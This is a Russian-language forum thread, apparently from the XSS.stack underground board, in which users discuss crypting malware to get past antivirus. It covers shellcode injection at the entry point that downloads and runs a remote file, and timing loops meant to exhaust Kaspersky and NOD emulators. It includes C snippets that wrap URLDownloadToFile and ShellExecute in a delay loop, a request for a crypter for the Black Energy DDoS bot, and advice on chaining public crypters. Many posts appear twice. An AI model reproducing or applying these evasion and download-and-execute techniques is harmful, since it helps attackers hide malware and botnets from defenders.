CannabiS
Так Ольгу или Hex? Что легче? Что лучше? Я тоже хочу :|
-
XSS.stack #1 – первый литературный журнал от юзеров форума
Крипторы
- Автор темы Killerkod
- Дата начала
OllyDBG конечно
Ну впервую очередь нужно знать ассемблер я полагаю
Да это классно, но пока выучишь ассемблер уу %)
=)
Да чего там знать? Не надо знать все ассемблерные инструкции, на деле нужно порядка пары десятков инструкций ну и хороший справочник по оным, чтоб нырять при встрече малознакомой.
Ну а насчет крипта при помощи хекс редактора и Ольги, так теперь с этим сложнее, ибо дописывание в стаб бинарника или расширение/дописывание последней секции - это уже не модно, эвристик сцуко верещит очень часто на такие вые*оны, поэтому актуальнее свой лоадер/маппер бинарников в память
Тут главное эмуляцию на##нуть...
[mod][-SMith-:] Без матов :\[/mod]
Да чего там знать? Не надо знать все ассемблерные инструкции, на деле нужно порядка пары десятков инструкций ну и хороший справочник по оным, чтоб нырять при встрече малознакомой.
Ну а насчет крипта при помощи хекс редактора и Ольги, так теперь с этим сложнее, ибо дописывание в стаб бинарника или расширение/дописывание последней секции - это уже не модно, эвристик сцуко верещит очень часто на такие вые*оны, поэтому актуальнее свой лоадер/маппер бинарников в память
Тут главное эмуляцию на##нуть...[mod][-SMith-:] Без матов :\[/mod]
Сказал старый Сильвер, сплюнул и затянулся беломором
)На##нуть каким образом? зациклить ее?
G100M
Лучше конечно найти путь, который эвристик не может пройти, сталобыть спотыкается, например в силу ограниченности окружения =)
Как-то попалась малварка, в ней использовался один метод старенький, я его для тестинга выдрал. Короче смысл такой, я собрал чистый бинарник и вставил в секцию кода(прямо на EntryPoint) шеллкод, который грузит из инторнета фаел и запускает. Кис 7.0.0.125 раскручивает его и грит, мол неизвестная малвара, сталобыть не сигнатурно задетектировал, и не эвристиком(в импортах нет опасны функций, бинарник вполне "добродушный"), а именно эмулятором. В общем запустил я этот шеллкод после использования выцепленного из малвары метода, и киса заткнулся. Сейчас в аттаче будет пример.
-SMith-
Извините, выражение устоявшееся, как-то не обратил внимания, в общем ненарочно.
Ну, можно зациклить, чтоб эвристик отрубился по таймауту. Я, к примеру, недавно переклепывал под фасм ETG(генератор мусора от Z0mbie), ну и перекомпилил экзампл именно самого генератора(в нем по факту вредоносного кода нет, лишь тулза), после проверил касперским(кис 7.0.0.125), так он бинарник в 4кб весом 12 секунд сканировал(по его счетчику), вредного ничего не нашел, но искал долго, там ветвлений много и псевдогенератор случайных чисел, вследствие чего понятно,что эвристики сейчас быстрые, а таймаут у них не маленький
Лучше конечно найти путь, который эвристик не может пройти, сталобыть спотыкается, например в силу ограниченности окружения =)
Как-то попалась малварка, в ней использовался один метод старенький, я его для тестинга выдрал. Короче смысл такой, я собрал чистый бинарник и вставил в секцию кода(прямо на EntryPoint) шеллкод, который грузит из инторнета фаел и запускает. Кис 7.0.0.125 раскручивает его и грит, мол неизвестная малвара, сталобыть не сигнатурно задетектировал, и не эвристиком(в импортах нет опасны функций, бинарник вполне "добродушный"), а именно эмулятором. В общем запустил я этот шеллкод после использования выцепленного из малвары метода, и киса заткнулся. Сейчас в аттаче будет пример.
-SMith-
Извините, выражение устоявшееся, как-то не обратил внимания, в общем ненарочно.
В это время какаду с его плеча горланил: "Пиастры!!! Пиастры!!!"
вот небольшой примерчик как это можно сделать в olly, этот способ спасает от слабеньких антивирей, а таких 70-80 % , сначала надо убедиться что атрибут участка кода writable если нет то поменять, идем к нулям вставляем код выполняем этот код в ольге, сохраняем полученный екзешник и меняем точку входа на наш код...
но против популярных антивирей у которых есть продвинутый эмулятор такое не пройдет. Так они сначала ждут расшифровки кода в памяти а уже потом сработают на известную сигнатуру...тут нужно применять разные хитрости...
так эмуляторы еще не знают всех инструкций проца , гдето приводился список таких в статье криса ксперски
вот такая еще есть идейка - против нода
URLDownloadToFile(NULL,"http://ya.ru/logo.png","C:\\11.png",0,0);
ShellExecute(0,"open","C:\\11.png",0,0,SW_SHOW); }
банально но срабатывает
long i,j ;
for (i=0;i<1000000000;i++) {j++;}
if (j > (10000000000-2)) {
URLDownloadToFile(NULL,"http://ya.ru/logo.png","C:\\11.png",0,0);
ShellExecute(0,"open","C:\\11.png",0,0,SW_SHOW); }
но против популярных антивирей у которых есть продвинутый эмулятор такое не пройдет. Так они сначала ждут расшифровки кода в памяти а уже потом сработают на известную сигнатуру...тут нужно применять разные хитрости...
так эмуляторы еще не знают всех инструкций проца , гдето приводился список таких в статье криса ксперски
вот такая еще есть идейка - против нода
URLDownloadToFile(NULL,"http://ya.ru/logo.png","C:\\11.png",0,0);
ShellExecute(0,"open","C:\\11.png",0,0,SW_SHOW); }
банально но срабатывает
long i,j ;
for (i=0;i<1000000000;i++) {j++;}
if (j > (10000000000-2)) {
URLDownloadToFile(NULL,"http://ya.ru/logo.png","C:\\11.png",0,0);
ShellExecute(0,"open","C:\\11.png",0,0,SW_SHOW); }
karabas-barabas
Ну да, эт и есть зацикливание.
А вообще, проставлять аттрибуты записи на секцию кода - это алерт, на такие фишки многие эвристики реагируют. На крайний случай проставлять эти аттрибуты прямо в памяти при помощи VirtualProtect, а если уж совсем честно, то в секции, не имеющие аттрибуты на запись, их лучше не проставлять и писать туда ничего не желательно. Если вы пишете прот под свой софт, то софт надо сделать с релоками и чтоб он не использовал ресурсов, тогда моно очень просто выделить память в любом(доступном) регионе виртуальной памяти и промапить свой софт туда, и не придется мудрить со сменой базы в PEB и прочей фигней.
А можно ссылку на статью касперски, вышеупомянутую?
Ну да, эт и есть зацикливание.
А вообще, проставлять аттрибуты записи на секцию кода - это алерт, на такие фишки многие эвристики реагируют. На крайний случай проставлять эти аттрибуты прямо в памяти при помощи VirtualProtect, а если уж совсем честно, то в секции, не имеющие аттрибуты на запись, их лучше не проставлять и писать туда ничего не желательно. Если вы пишете прот под свой софт, то софт надо сделать с релоками и чтоб он не использовал ресурсов, тогда моно очень просто выделить память в любом(доступном) регионе виртуальной памяти и промапить свой софт туда, и не придется мудрить со сменой базы в PEB и прочей фигней.
А можно ссылку на статью касперски, вышеупомянутую?
вот эта статья здесь
но только что проверил prefetch [eax] уже не актуально, только эмуль Normana не смог справиться , а так все остальные легко.
Получается еще одну статейку видел, не эту там очень много команд приводилось...если вспомню выложу ссылку
кстати закливанием можно чистить без проблем стабы джойнеров, я бы не сказал, что антивирусы начинают при этом визжать просто возможно добавляют +1 raiting но это не всегда мешает...
но только что проверил prefetch [eax] уже не актуально, только эмуль Normana не смог справиться , а так все остальные легко.
Получается еще одну статейку видел, не эту там очень много команд приводилось...если вспомню выложу ссылку
кстати закливанием можно чистить без проблем стабы джойнеров, я бы не сказал, что антивирусы начинают при этом визжать просто возможно добавляют +1 raiting но это не всегда мешает...
SilverT
Палицо как доунлодер и неипёт.....
Палицо как доунлодер и неипёт.....
TheSADIST
Чем?
Чем?
уже всем вроде...
p.s. для тренировок прикрепил
абсолютно безвредный самый маленький трой на c++ 1 кб
(переименовать в .exe)
p.s. для тренировок прикрепил
абсолютно безвредный самый маленький трой на c++ 1 кб
(переименовать в .exe)
karabas-barabas
Я для примера давал, все применительно к КИС 7.0.0.125 без баз. какбэ целью стояло тестинг эвристики. Естественно вышевыложенную фишку почти все сейчас палят, ибо баян давно минувших дней...
В вашем примере в таблице импорта "опасные функции", такое может запалиццо на этапе эвристики, сталобыть явно картину с эмуляцией не отражает, я для того шеллкод и брал, чтоб в импортах не было "опасного"
, чтоб именно эмулятор детектировал.
TheSADIST
У вас кис 7.0.0.125 запалил?
Я для примера давал, все применительно к КИС 7.0.0.125 без баз. какбэ целью стояло тестинг эвристики. Естественно вышевыложенную фишку почти все сейчас палят, ибо баян давно минувших дней...
В вашем примере в таблице импорта "опасные функции", такое может запалиццо на этапе эвристики, сталобыть явно картину с эмуляцией не отражает, я для того шеллкод и брал, чтоб в импортах не было "опасного"
, чтоб именно эмулятор детектировал.
TheSADIST
У вас кис 7.0.0.125 запалил?
SilverT
8.0.0.454
8.0.0.454
кстати может кто-то знает паблик криптор сделанный 2 файлами stub.exe и bilder.exe , который маппит образ файла в память (api CreateFileMapping, UnMapViewofFile, MapViewofFile) ?
TheSADIST
Дык я написал применительно к кис 7.0.0.125, ессесно в последних версиях эмулятор модернизировали и все бояны запалились, я ж для примера выложил.
karabas-barabas
хз такой, но если файл маппится с флагом SEC_IMAGE, то эт скорее всего чтоб избавить себя от маппинга ручками
Дык я написал применительно к кис 7.0.0.125, ессесно в последних версиях эмулятор модернизировали и все бояны запалились, я ж для примера выложил.
karabas-barabas
хз такой, но если файл маппится с флагом SEC_IMAGE, то эт скорее всего чтоб избавить себя от маппинга ручками
чем закриптовать Black Energy DDoS bot? Подскажите криптор плиз
называется "Приватный криптор"...
p.s. продолжая по теме прозрел от эмулятора кашпера очень качественный продукт, такое ощущение, что у него в эмуляторе "win xp" урезанная версия запускается...но и это его не спасает
p.s. продолжая по теме прозрел от эмулятора кашпера очень качественный продукт, такое ощущение, что у него в эмуляторе "win xp" урезанная версия запускается...но и это его не спасает
Да мне хотя бы пабл криптор, главное чтоб работало
ты хотя бы думай прежде чем говорить глупость,
так тебя щас и закидали крипторами...
пабл он на то и пабл, что толку от него нет -
это щас денег стоит, вроде как от 5 баксов одна криптовка...
вообщем если не хоч платить , то могу посоветовать использовать связки пабл крипторов, сначала навешиваешь протектор, а потом криптор...
но тогда тебе 2 вагона геммороя обеспечено, пока подберешь чтоб не палилось и бот не слетал
так тебя щас и закидали крипторами...
пабл он на то и пабл, что толку от него нет -
это щас денег стоит, вроде как от 5 баксов одна криптовка...
вообщем если не хоч платить , то могу посоветовать использовать связки пабл крипторов, сначала навешиваешь протектор, а потом криптор...
но тогда тебе 2 вагона геммороя обеспечено, пока подберешь чтоб не палилось и бот не слетал